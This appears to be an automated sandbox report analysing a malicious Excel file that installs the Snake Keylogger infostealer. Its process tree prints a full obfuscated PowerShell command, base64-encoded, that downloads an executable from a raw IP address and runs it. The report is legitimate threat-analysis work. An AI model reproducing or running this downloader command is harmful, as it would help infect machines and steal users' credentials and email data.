Analysis

  • max time kernel
    140s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    05-10-2024 01:55

General

  • Target

    e7163358d7945ac9fa343eb49725d8ce1021993347178b1f5725e4689fd35059.xls

  • Size

    1.0MB

  • MD5

    a88d8222f0c50bf06a91b3a9567c3306

  • SHA1

    eb6afe8b34c4fd7c15104630e6a666322ba7420f

  • SHA256

    e7163358d7945ac9fa343eb49725d8ce1021993347178b1f5725e4689fd35059

  • SHA512

    0db10f1be93c95dda95425cff166e5ef87e3db6daa8f1ca882dd97a5a8f9bde893a3586bdd0a2ceeb744bd8d5c70b2c2a5c3388a1fe193a1d9501c76c8569259

  • SSDEEP

    12288:xmzHJEHAfwu4hqD3DERnLRmF8DfPrf173d2FuLg70Je/mAI98dvj54002UZlAZ:gLw/hqbARM83V3uaGjS000

Malware Config

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\e7163358d7945ac9fa343eb49725d8ce1021993347178b1f5725e4689fd35059.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2220
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2668
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C POWeRSHELL -Ex BYPass -NOP -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGJCbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6Q3JWQ1p0aCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW5UT3EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRXNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUFnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxSGllTTduOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi8yODAvdGFza2hvc3R3LmV4ZSIsIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1NUQVJULXNMRWVwKDMpO3NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIg=='+[cHAR]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2236
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POWeRSHELL -Ex BYPass -NOP -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGJCbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6Q3JWQ1p0aCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW5UT3EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRXNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUFnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxSGllTTduOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi8yODAvdGFza2hvc3R3LmV4ZSIsIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1NUQVJULXNMRWVwKDMpO3NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIg=='+[cHAR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1688
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\syucg36e.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2756
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE88.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAE87.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1860
        • C:\Users\Admin\AppData\Roaming\taskhostw.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2972
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:1332

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\84E5DB7D6CF82B1C16085F0DF3A4BCE7

    Filesize

    504B

    MD5

    e83da614a56b0d687459c7c66d655508

    SHA1

    9c56d105eeca4ed833ad1ac85bfdc983467619f4

    SHA256

    0dfb3e8bfcaf61c58859eb1ff31961a591332aeda11fe6df64612fbd039872e4

    SHA512

    97cb55d600c3693c68757d81340c2cb95ee298faeefec384ebfc7a6c76c7f98acce07556d488502e2f7d71aee5d5b43d6a9dc93ba97331d8133263bf59417fc8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    46de1db99004160eebf61f3ad013d90c

    SHA1

    cd4c9eafa3674ed3cb250813ef95f2da44abdb2b

    SHA256

    405573788f879709690e4d56d46ffce1a6f81867ca0c5007d628474027a2eb89

    SHA512

    c402d5cc6c23bfed508e3c02aa56bb32754bee02292853eb5dbea57fb359f218589ddf70db248ff7898dba206171a9e46ff767a2b3fe8930a17f58dcd2cbea17

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\84E5DB7D6CF82B1C16085F0DF3A4BCE7

    Filesize

    546B

    MD5

    0220b821eb2ece3a61ddc0e0b3544d61

    SHA1

    da3265b1a9e0522398cb4fcb2d8cfb206990840b

    SHA256

    e83883323fb0a443890032f95f859199874cec29667a712f9524dacc53e1d832

    SHA512

    87833538a426597b1f01f59a094c86abb55587b1e9bc83249b47a18b5d333e23cb7836aeabc8940f39f3ddaea2c785bf92db7ae37c82a0be860bab67a5ea7abb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    9db8f9acb848c9c767bac4fd03bdab7a

    SHA1

    804d0881cf3014a8c7108ced7cc511467cfd5607

    SHA256

    6095b4ff31911bfa2a85b7fbdf5d2a6814a4bae4383e5b029464e5dfe0e24cba

    SHA512

    0c2e1f803a77ac93520f22a6bc0c8a0be3c5b919df7894f4f092b4f13585db070c9e008c8f966d6fe3e89e25d9129f0e63ec206e7ee79876ecd8f046d91d9afa

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\newserviceupdation[1].hta

    Filesize

    8KB

    MD5

    cf19efb65170759203405e46dc871d97

    SHA1

    56f7b49dfeec086c3ab3a3a3dff1812beea8334b

    SHA256

    6670374e84ce7f4c5fd02ee4d31e9f268d636658d38dbcea813967c6431fc0fe

    SHA512

    1c2a7f1151cb70882d6aff7dfc02eae0c5504ca213672c6044af82d2444b5520e8a4263cd4c06dabcbedd9fcc1ade4d37bc2e0a5b6dd4af2d02734bdc07773a1

  • C:\Users\Admin\AppData\Local\Temp\CabA87F.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESAE88.tmp

    Filesize

    1KB

    MD5

    089f8eb90fc8e60b5904a6cdc007dedc

    SHA1

    8fcd5caeb3ec396c3a5795eb9a2940fba33ebefc

    SHA256

    6b6169221e1e4ba1c4ac7e44819575eebf2452c02c4f02607b6d2b19127133dd

    SHA512

    566527d7717ec0e062727d106c6715c1374c67c59ef29f4915315451f015584a1bcb51066ea63c08a665ba43cd1a6689fde8fc68d22811125f104d851c7273b0

  • C:\Users\Admin\AppData\Local\Temp\syucg36e.dll

    Filesize

    3KB

    MD5

    492bcc07738146b64450c3252f7145db

    SHA1

    9149c8359d830adeb88f857d5a56fc0ba13d6473

    SHA256

    ab3d5165617c135a0f02511bfee685fc6b8363911761a59e2330c9e1a0b824f9

    SHA512

    5988eda74325457fbe5aa9c1facf149bb8f63c8af1131ccbd54f371fc89d1e38264a77f45fb8b3b2128625b02e4863a8d7cfdb6745faf41a680ecd3a03e62fef

  • C:\Users\Admin\AppData\Local\Temp\syucg36e.pdb

    Filesize

    7KB

    MD5

    14374a78d153312069fabf40f8af4694

    SHA1

    bba02173252bbfd50889ac9a2676d3fb88dc9173

    SHA256

    5b10b1d31af775f6972bdbc251811e880ce23eb3bdd99923560c1e1f3968b5b5

    SHA512

    3f8cfcbaf3f7b1602310a51f8b80deba2126b44e224918f8ff056555ba7a547f9aeb07255eb543746b54a5c060a130ddbf2f32c01f5b0cd08c19445937aa5f8d

  • C:\Users\Admin\AppData\Roaming\taskhostw.exe

    Filesize

    949KB

    MD5

    822a424b469a4aec464f209d49dd072f

    SHA1

    67745d9c1f41b590f8cd2d376eaf11e7d07ff72c

    SHA256

    859d05f0772aea7288798439bf948694e3d8f2636fadca063814659db5635a48

    SHA512

    62492a6438cdfa94e0e1d6dc0b493a6ff234faf7f4ef9e27d6822729115a9d0224a19558915cdb883570cf73363bbb404a9a75bbe9a15e7e998102e46eff8a4a

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCAE87.tmp

    Filesize

    652B

    MD5

    d47c53842e91caea3c4af466054e63fc

    SHA1

    dbc58c94798e297b80fddd65658736ee49fe5557

    SHA256

    0c222ff632d3643653403995cbd0951ab8f5180d9b9a9086d7ac7cc485763e79

    SHA512

    5db0963d42c3f0ed5ce078271abae7a76214976bb45013fd3ee18c3dff7de54da09b0dec76c1abc0cb8ee56a6a7bfad6e3706a49f5f5c45339a7cf8d2a6fa7dd

  • \??\c:\Users\Admin\AppData\Local\Temp\syucg36e.0.cs

    Filesize

    481B

    MD5

    7a5c1e0b06cc6f06cecbd9bc851739e0

    SHA1

    69fbe90e70a9cebb5a9af8afdabbfc72c6bc679a

    SHA256

    81ea592f9c853de03314de17a3b8d1533a08013f295333ffe60b9e4bdc9872c1

    SHA512

    166e754b88d9a7c505ba816beea8934c181895006d993c5ccba159c5f1b8d1fe0fa9fa0f756b080a85ee42079b285fc20bff21ab5aa5c7a3ebc8359e5bc50f3f

  • \??\c:\Users\Admin\AppData\Local\Temp\syucg36e.cmdline

    Filesize

    309B

    MD5

    78d96759cf049bd53e65184566174643

    SHA1

    a76e85c5395b4ed8acaebb9115d54f1cb3acfe61

    SHA256

    b4f1700eaefa4cbf9e3668291032cf216a497f61d9cc02b51196a623624522c1

    SHA512

    2d47f382b135a5d2cf3367082a8fa1d824c1e42bd29da34ee63a18cdfc86930ce25ceb11d11e0512b955e7f90cd56ab84aa034146848f06a9dafdb10402cbac0

  • memory/1332-66-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1332-67-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/1332-68-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2220-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2220-1-0x000000007240D000-0x0000000072418000-memory.dmp

    Filesize

    44KB

  • memory/2220-19-0x00000000024A0000-0x00000000024A2000-memory.dmp

    Filesize

    8KB

  • memory/2220-69-0x000000007240D000-0x0000000072418000-memory.dmp

    Filesize

    44KB

  • memory/2668-18-0x0000000002BE0000-0x0000000002BE2000-memory.dmp

    Filesize

    8KB